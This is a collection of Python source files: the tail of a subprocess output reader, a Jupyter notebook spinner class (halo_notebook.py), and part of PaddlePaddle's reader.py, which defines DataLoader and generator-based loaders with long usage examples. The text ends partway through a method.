if not silent:
print('{}'.format(c))
if report == True:
buff.append(c)
else:
break
return success, buff
# some tricks for the async stdout reading
q = Queue.Queue()
thread = threading.Thread(target=q_output, args=(proc.stdout, q))
thread.daemon = True
thread.start()
failed_words = ["fail", "error"]
last = datetime.now()
lastsec = 0.
while True:
try:
line = q.get_nowait()
except Queue.Empty:
pass
else:
if line == '':
break
line = line.decode().lower().strip()
if line != '':
now = datetime.now()
dt = now - last
tsecs = dt.total_seconds() - lastsec
line = "(elapsed:{0})-->{1}".format(tsecs, line)
lastsec = tsecs + lastsec
buff.append(line)
if not silent:
print(line)
for fword in failed_words:
if fword in line:
success = False
break
if proc.poll() is not None:
break
proc.wait()
thread.join(timeout=1)
buff.extend(proc.stdout.readlines())
proc.stdout.close()
for line in buff:
if normal_msg in line:
print("success")
success = True
break
if pause:
input('Press Enter to continue...')
return success, buff
|
halo_notebook.py | from __future__ import absolute_import, print_function, unicode_literals
import sys
import threading
import cursor
from ..halo import Halo
from ..halo._utils import (colored_frame, decode_utf_8_text)
class HaloNotebook(Halo):
def __init__(self, text='', color='cyan', text_color=None, spinner=None, placement='left',
animation=None, interval=-1, enabled=True, stream=sys.stdout):
super(HaloNotebook, self).__init__(text=text,
color=color,
text_color=text_color,
spinner=spinner,
placement=placement,
animation=animation,
interval=interval, enabled=enabled,
stream=stream)
self.output = self._make_output_widget()
def _make_output_widget(self):
from ipywidgets.widgets import Output
return Output()
# TODO: using property and setter
def _output(self, text=''):
return ({'name': 'stdout', 'output_type': 'stream', 'text': text},)
def clear(self):
if not self._enabled:
return self
with self.output:
self.output.outputs += self._output('\r')
self.output.outputs += self._output(self.CLEAR_LINE)
self.output.outputs = self._output()
return self
def _render_frame(self):
frame = self.frame()
output = '\r{0}'.format(frame)
with self.output:
self.output.outputs += self._output(output)
def start(self, text=None):
if text is not None:
self.text = text
if not self._enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide()
self.output = self._make_output_widget()
from IPython.display import display
display(self.output)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop_and_persist(self, symbol=' ', text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self._enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text['original']
text = text.strip()
if self._text_color:
text = colored_frame(text, self._text_color)
self.stop()
output = '\r{0} {1}\n'.format(*[
(text, symbol)
if self._placement == 'right' else
(symbol, text)
][0])
with self.output:
self.output.outputs = self._output(output)
|
reader.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & failed quickly ] These value is used in getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == np.object:
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader prodives an iterator which iterates given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-prcess data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader only supports map-style dataset(can get a sample from
dataset with a given index) currently, for a map-style dataset,
please see :code:`paddle.io.Dataset`.
batch_sampler please see :code:`paddle.io.BatchSampler`
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed variable list.
The variables should be created by :code:`fluid.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)): a list of Place, to put data
onto, :attr:`places` must be set in both static graph and
dynamic graph mode, in dynamic graph mode, place number must
be 1. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> LoDTensor, where
the key of the dict is the name of each fed variables. If
:attr:`return_list=True`, the return value on each device would
be a list(LoDTensor). :attr:`return_list` can only be True
in dynamic graph mode. Default False.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whther to shuffle indices order before genrate
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating sysytem) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether use GPU to run model
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
# get places
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
# -------------------- static graph ---------------------
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM, act='softmax')
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
image = fluid.data(name='image', shape=[None, IMAGE_SIZE], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
loss = simple_net(image, label)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
loader = DataLoader(dataset,
feed_list=[image, label],
places=places,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, data in enumerate(loader()):
l = exe.run(prog, feed=data, fetch_list=[loss], return_numpy=True)
print("Epoch {} batch {}: loss = {}".format(e, i, l[0][0]))
# -------------------------------------------------------
# --------------------- dygraph mode --------------------
class SimpleNet(fluid.dygraph.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = fluid.dygraph.nn.Linear(IMAGE_SIZE, CLASS_NUM, act='softmax')
def forward(self, image, label=None):
return self.fc(image)
with fluid.dygraph.guard(places[0]):
simple_net = SimpleNet()
opt = fluid.optimizer.SGD(learning_rate=1e-3,
parameter_list=simple_net.parameters())
loader = DataLoader(dataset,
places=places[0],
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = fluid.layers.cross_entropy(out, label)
avg_loss = fluid.layers.reduce_mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
# -------------------------------------------------------
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=False,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
assert places is not None, "places cannot be None"
self.places = _convert_places(places)
if in_dygraph_mode():
assert len(self.places) == 1, \
"Number of places must be 1 in dygraph mode"
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert isinstance(batch_sampler, BatchSampler), \
"batch_sampler should be None or subclass instance " \
"of paddle.io.BatchSampler"
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
else:
assert batch_size is not None and batch_size > 0, \
"batch_size should be a positive value when " \
"batch_sampler is not given"
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
return len(self.batch_sampler)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process. This mode is designed to be compatible with the
:code:`fluid.layers.py_reader` interface. Users can migrate the codes
from :code:`fluid.layers.py_reader` to :code:`fluid.io.DataLoader`
easily when using iterable=False.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM)
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except fluid.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = fluid.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `fluid.cuda_places()` to get all GPU places.
# - If you are using CPU, call `fluid.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
set_data_source(loader, places)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
'''
Users can use return_list = True in dygraph mode.
'''
with fluid.dygraph.guard(places[0]):
loader = fluid.io.DataLoader.from_generator(capacity=2, return_list=True)
set_data_source(loader, places[0])
for image, label in loader():
relu = fluid.layers.relu(image)
assert image.shape == [BATCH_SIZE, 784]
assert label.shape == [BATCH_SIZE, 1]
assert relu.shape == [BATCH_SIZE, 784]
Examples 2:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = fluid.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = fluid.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, fluid.cpu_places())
exe = fluid.Executor(fluid.CPUPlace())
prog = fluid.CompiledProgram(fluid.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)): places where the result
data should be converted.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle.fluid as fluid
image = fluid.data(name='image', shape=[None, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
dataset = fluid.DatasetFactory().create_dataset("QueueDataset")
dataset.set_batch_size(32)
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
dataset.set_use_var([image, label])
dataset.set_pipe_command('cat')
loader = fluid.io.DataLoader.from_dataset(dataset, fluid.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
# process, it shuts the all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here nedd to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# has no enough time to put the data in the queue when the main process
# start trying to get data from queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid handing ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
